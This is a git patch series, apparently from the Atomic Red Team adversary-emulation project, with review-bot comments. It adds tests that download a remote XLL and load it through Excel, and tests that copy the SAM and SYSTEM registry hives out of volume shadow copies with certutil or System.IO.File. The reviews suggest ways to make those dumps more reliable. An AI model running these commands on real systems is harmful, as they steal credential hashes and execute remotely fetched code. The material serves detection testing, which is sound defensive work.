[CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md index c2efb0a5..b6954e19 100644 --- a/atomics/Indexes/Matrices/windows-matrix.md +++ b/atomics/Indexes/Matrices/windows-matrix.md 
@@ -4,7 +4,7 @@ | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object 
Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Add-ins](../../T1137.006/T1137.006.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
| [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Binary Padding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) | | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Trust Discovery](../../T1482/T1482.md) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 
Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 862d546d..54940482 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -37573,7 +37573,31 @@ persistence: x_mitre_platforms: - Windows - Office 365 - atomic_tests: [] + identifier: T1137.006 + atomic_tests: + - name: Code Executed Via Excel Add-in File (Xll) + auto_generated_guid: 441b1a0f-a771-428a-8af0-e99e4698cda3 + description: "Downloads a XLL file and loads it using the excel add-ins library.\nThis + causes excel to display the message \"Hello World\"\nSource of XLL - https://github.com/edparcell/HelloWorldXll + \n" + supported_platforms: + - windows + input_arguments: + xll_url: + description: url of the file HelloWorldXll.xll + type: url + default: https://https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1137.006/bin/HelloWorldXll.xll?raw=true + local_file: + description: name of the xll file + type: path + default: "$env:tmp\\HelloWorldXll.xll" + executor: + name: powershell + elevation_required: true + command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX + ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))" + +' T1098.001: technique: external_references: diff --git a/atomics/T1137.006/T1137.006.md b/atomics/T1137.006/T1137.006.md new file mode 100644 index 00000000..06946afe --- /dev/null +++ b/atomics/T1137.006/T1137.006.md @@ -0,0 +1,47 @@ +# T1137.006 - Add-ins +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137/006) +
Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs. (Citation: Microsoft Office Add-ins) There are different types of add-ins that can be used by the various Office products; including Word/Excel add-in Libraries (WLL/XLL), VBA add-ins, Office Component Object Model (COM) add-ins, automation add-ins, VBA Editor (VBE), Visual Studio Tools for Office (VSTO) add-ins, and Outlook add-ins. (Citation: MRWLabs Office Persistence Add-ins)(Citation: FireEye Mail CDS 2018) + +Add-ins can be used to obtain persistence because they can be set to execute code when an Office application starts.
+ +## Atomic Tests + +- [Atomic Test #1 - Code Executed Via Excel Add-in File (Xll)](#atomic-test-1---code-executed-via-excel-add-in-file-xll) + + +
+ +## Atomic Test #1 - Code Executed Via Excel Add-in File (Xll) +Downloads a XLL file and loads it using the excel add-ins library. +This causes excel to display the message "Hello World" +Source of XLL - https://github.com/edparcell/HelloWorldXll + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 441b1a0f-a771-428a-8af0-e99e4698cda3 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| xll_url | url of the file HelloWorldXll.xll | url | https://https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1137.006/bin/HelloWorldXll.xll?raw=true| +| local_file | name of the xll file | path | $env:tmp\HelloWorldXll.xll| + + +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) + + +```powershell +powershell -c "iwr -URI '#{xll_url}' -o '#{local_file}'; IEX ((new-object -ComObject excel.application).RegisterXLL('$env:tmp\HelloWorldXll.xll'))" +``` + + + + + + +
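Review bot: The default for `xll_url` carries a doubled scheme, `https://https://github.com/...`, so the `iwr` download cannot resolve and the test fails before the add-in path is exercised; the value shows up here in both the index.yaml hunk and the generated T1137.006.md, but it originates in T1137.006.yaml from the first patch of this series, which is outside this hunk, so the fix belongs there followed by a regeneration of the index and markdown. The executor also registers the hard-coded path `'$env:tmp\HelloWorldXll.xll'` rather than `'#{local_file}'`, so a caller who overrides `local_file` downloads to one location and loads a file from another; `RegisterXLL('#{local_file}')` keeps the two in step. Nothing verifies the downloaded binary before Excel loads it; recording the expected hash of the bin/ artifact in the description (a value to be taken from the repository, not reproduced here) would let an operator confirm what is being executed.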
From bd5ae3ad84c42f60329f60b85961003ab7d93ee2 Mon Sep 17 00:00:00 2001 From: Brandon Morgan Date: Sat, 7 Aug 2021 13:14:14 -0500 Subject: [PATCH 04/39] dump shadow hive w/ certutil (#1594) --- atomics/T1003.002/T1003.002.yaml | 31 ++++++++++++++++++++++++++++++- 1 file changed, 30 insertions(+), 1 deletion(-) diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 958fac22..7b563d3e 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -98,4 +98,33 @@ atomic_tests: Invoke-PowerDump name: powershell elevation_required: true - + +- name: dump volume shadow copy hive with certutil + description: | + Dump the SAM hive from volume shadow copies with the certutil utility + This can be done with a non-admin user account + supported_platforms: + - windows + input_arguments: + file_path: + description: Path where the hive will be dumped + type: Path + default: $ENV:temp + file_name: + description: Name of the dumped hive + type: String + default: myhive + executor: + command: | + write-host "" + $shadowlist = get-wmiobject win32_shadowcopy + $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} + $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] + $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM" + certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2 + name: powershell + elevation_required: false + cleanup_command: | + write-host "" + $toremove = #{file_path} + "\" + '#{file_name}' + rm $toremove From 38cd41e80e38515b98d13cb3dfb24760bb5aa413 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Sat, 7 Aug 2021 18:14:36 +0000 Subject: [PATCH 05/39] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.002/T1003.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) 
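Review bot: `$shadowcopy.DeviceObject[-1]` keeps only the last character of the device path, so on a host with ten or more snapshots `HarddiskVolumeShadowCopy10` sorts as `0` and `$maxvolume` selects the wrong snapshot; extracting the numeric suffix instead, `$volumenumbers = foreach($shadowcopy in $shadowlist){[int]($shadowcopy.DeviceObject -replace '.*HarddiskVolumeShadowCopy','')}`, sorts correctly, and the empty-`$shadowlist` case (which currently yields an empty `$maxvolume` and a malformed `$shadowpath`) deserves an explicit check before certutil runs. The same construct is repeated in the System.IO.File test added by the later `@@ -121,11 +125,45 @@` hunk of T1003.002.yaml. The description's "non-admin user account" claim and `elevation_required: false` hold only where the snapshot's hive files happen to be readable by standard users, which depends on the host's build and patch state; the description should name that precondition so a permission failure is not misread as a detection. `type: Path` and `type: String` are capitalised while the other test on this page uses lowercase `url` and `path`, and `#{file_path}` is interpolated bare in both the executor and `cleanup_command` whereas `'#{file_name}'` is quoted, so only a PowerShell expression such as the default `$ENV:temp` parses as the path; `"#{file_path}"` accepts a literal path as well.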
diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index 7b563d3e..d2efab7b 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -100,6 +100,7 @@ atomic_tests: elevation_required: true - name: dump volume shadow copy hive with certutil + auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7 description: | Dump the SAM hive from volume shadow copies with the certutil utility This can be done with a non-admin user account diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 30af7be8..9cc61f62 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -759,3 +759,4 @@ c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 7b697ece-8270-46b5-bbc7-6b9e27081831 419cca0c-fa52-4572-b0d7-bc7c6f388a27 441b1a0f-a771-428a-8af0-e99e4698cda3 +eeb9751a-d598-42d3-b11c-c122d9c3f6c7 From 8d84482954bbe5d9e5ada9df3c5b10483b5c3c88 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Sat, 7 Aug 2021 18:14:40 +0000 Subject: [PATCH 06/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 30 ++++++++++++ atomics/T1003.002/T1003.002.md | 48 +++++++++++++++++++ 6 files changed, 82 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 45bbdc86..55fa2871 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -76,6 +76,7 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index a1f784a4..3f7d3f9e 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -52,6 +52,7 @@ credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, cr
 credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt
 credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt
 credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
+credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hive with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
 collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 44a94f8d..8aa3bf01 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -122,6 +122,7 @@ - Atomic Test #2: Registry parse with pypykatz [windows] - Atomic Test #3: esentutl.exe SAM copy [windows] - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows] + - Atomic Test #5: dump volume shadow copy hive with certutil [windows] - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 97ec109c..a5799b2d 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -90,6 +90,7 @@ - Atomic Test #2: Registry parse with pypykatz [windows] - Atomic Test #3: esentutl.exe SAM copy [windows] - Atomic Test #4: PowerDump Registry dump of SAM for hashes and usernames [windows] + - Atomic Test #5: dump volume shadow copy hive with certutil [windows] - T1558.002 Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 54940482..74487a9b 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -5440,6 +5440,36 @@ credential-access: Invoke-PowerDump name: powershell elevation_required: true + - name: dump volume shadow copy hive with certutil + auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7 + description: | + Dump the SAM hive from volume shadow copies with the certutil utility + This can be done with a non-admin user account + supported_platforms: + - windows + input_arguments: + file_path: + description: Path where the hive will be dumped + type: Path + default: "$ENV:temp" + file_name: + description: Name of the dumped hive + type: String + default: myhive + executor: + command: | + write-host "" + $shadowlist = get-wmiobject win32_shadowcopy + $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} + $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] + $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM" + certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2 + name: powershell + elevation_required: false + cleanup_command: | + write-host "" + $toremove = #{file_path} + "\" + '#{file_name}' + rm $toremove T1555.002: technique: external_references: diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index ad162a55..80948108 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -32,6 +32,8 @@ Notes: - [Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames](#atomic-test-4---powerdump-registry-dump-of-sam-for-hashes-and-usernames) +- [Atomic Test #5 - dump volume shadow copy hive with certutil](#atomic-test-5---dump-volume-shadow-copy-hive-with-certutil) +
@@ -204,4 +206,50 @@ Invoke-PowerDump +
+
+ +## Atomic Test #5 - dump volume shadow copy hive with certutil +Dump the SAM hive from volume shadow copies with the certutil utility +This can be done with a non-admin user account + +**Supported Platforms:** Windows + + +**auto_generated_guid:** eeb9751a-d598-42d3-b11c-c122d9c3f6c7 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| file_path | Path where the hive will be dumped | Path | $ENV:temp| +| file_name | Name of the dumped hive | String | myhive| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +write-host "" +$shadowlist = get-wmiobject win32_shadowcopy +$volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} +$maxvolume = ($volumenumbers | Sort-Object -Descending)[0] +$shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM" +certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2 +``` + +#### Cleanup Commands: +```powershell +write-host "" +$toremove = #{file_path} + "\" + '#{file_name}' +rm $toremove +``` + + + + +
From ddeb15ae41913d66c6b104c0807ee4a5e7d1ed8c Mon Sep 17 00:00:00 2001 From: Brandon Morgan Date: Mon, 9 Aug 2021 11:07:00 -0500 Subject: [PATCH 07/39] Update T1003.002.yaml (#1595) Added test 6 to dump hives with System.IO.File. Also tweaked test 5 so that the hive could be selected by the user, same as in test 6 --- atomics/T1003.002/T1003.002.yaml | 52 +++++++++++++++++++++++++++----- 1 file changed, 45 insertions(+), 7 deletions(-) diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index d2efab7b..db4530ac 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -99,19 +99,23 @@ atomic_tests: name: powershell elevation_required: true -- name: dump volume shadow copy hive with certutil +- name: dump volume shadow copy hives with certutil auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7 description: | - Dump the SAM hive from volume shadow copies with the certutil utility + Dump hives from volume shadow copies with the certutil utility This can be done with a non-admin user account supported_platforms: - windows input_arguments: - file_path: + dump_path: description: Path where the hive will be dumped type: Path default: $ENV:temp - file_name: + target_hive: + description: Hive you wish to dump + type: String + default: SAM + dumped_hive: description: Name of the dumped hive type: String default: myhive 
@@ -121,11 +125,45 @@ atomic_tests: $shadowlist = get-wmiobject win32_shadowcopy $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] - $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\SYSTEM" - certutil -f -v -encodehex $shadowpath #{file_path}\#{file_name} 2 + $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}" + certutil -f -v -encodehex $shadowpath #{dump_path}\#{dumped_hive} 2 name: powershell elevation_required: false cleanup_command: | write-host "" - $toremove = #{file_path} + "\" + '#{file_name}' + $toremove = #{dump_path} + "\" + '#{dumped_hive}' rm $toremove + +- name: dump volume shadow copy hives with System.IO.File + description: | + Dump hives from volume shadow copies with System.IO.File + supported_platforms: + - windows + input_arguments: + dump_path: + description: Path where the hive will be dumped + type: Path + default: $ENV:temp + target_hive: + description: Hive you wish to dump + type: String + default: SAM + dumped_hive: + description: Name of the dumped hive + type: String + default: myhive + executor: + command: | + write-host "" + $shadowlist = get-wmiobject win32_shadowcopy + $volumenumbers = foreach($shadowcopy in $shadowlist){$shadowcopy.DeviceObject[-1]} + $maxvolume = ($volumenumbers | Sort-Object -Descending)[0] + $shadowpath = "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy" + $maxvolume + "\Windows\System32\config\#{target_hive}" + $mydump = #{dump_path} + '\' + '#{dumped_hive}' + [System.IO.File]::Copy($shadowpath , $mydump) + name: powershell + elevation_required: false + cleanup_command: | + write-host "" + $toremove = #{dump_path} + "\" + '#{dumped_hive}' + rm $toremove \ No newline at end of file From bb1885e040f84ea13a5012a6b4bb338e342db639 Mon Sep 17 00:00:00 2001 
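Review bot: `$shadowcopy.DeviceObject[-1]` keeps only the last character of the device name, so on a host whose newest snapshot is `HarddiskVolumeShadowCopy10` or higher the string sort behind `$maxvolume` selects the wrong copy and `$shadowpath` points at a stale or non-existent snapshot; the new test 6 inherits this from test 5. Parsing the numeric suffix fixes it, e.g. `$volumenumbers = foreach($shadowcopy in $shadowlist){ [int]($shadowcopy.DeviceObject -replace '^.*HarddiskVolumeShadowCopy','') }`. Both tests would also benefit from a `dependencies:` entry whose `prereq_command` confirms that `get-wmiobject win32_shadowcopy` returns at least one entry, because with no shadow copies `$maxvolume` is empty and the failure surfaces as an unrelated path error rather than a missing prerequisite. Test 6 drops the `This can be done with a non-admin user account` sentence that test 5's description carries even though both set `elevation_required: false`; if that holds for `[System.IO.File]::Copy` as well, the description should say so.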
From: CircleCI Atomic Red Team GUID generator Date: Mon, 9 Aug 2021 16:07:19 +0000 Subject: [PATCH 08/39] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.002/T1003.002.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1003.002/T1003.002.yaml b/atomics/T1003.002/T1003.002.yaml index db4530ac..27c10567 100644 --- a/atomics/T1003.002/T1003.002.yaml +++ b/atomics/T1003.002/T1003.002.yaml @@ -135,6 +135,7 @@ atomic_tests: rm $toremove - name: dump volume shadow copy hives with System.IO.File + auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 description: | Dump hives from volume shadow copies with System.IO.File supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 9cc61f62..04ced245 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -760,3 +760,4 @@ c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 419cca0c-fa52-4572-b0d7-bc7c6f388a27 441b1a0f-a771-428a-8af0-e99e4698cda3 eeb9751a-d598-42d3-b11c-c122d9c3f6c7 +9d77fed7-05f8-476e-a81b-8ff0472c64d0 From 6e4cbb9e85a5595cb3bb31a2fdfb14e3bd073886 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 9 Aug 2021 16:07:26 +0000 Subject: [PATCH 09/39] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 3 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 3 +- 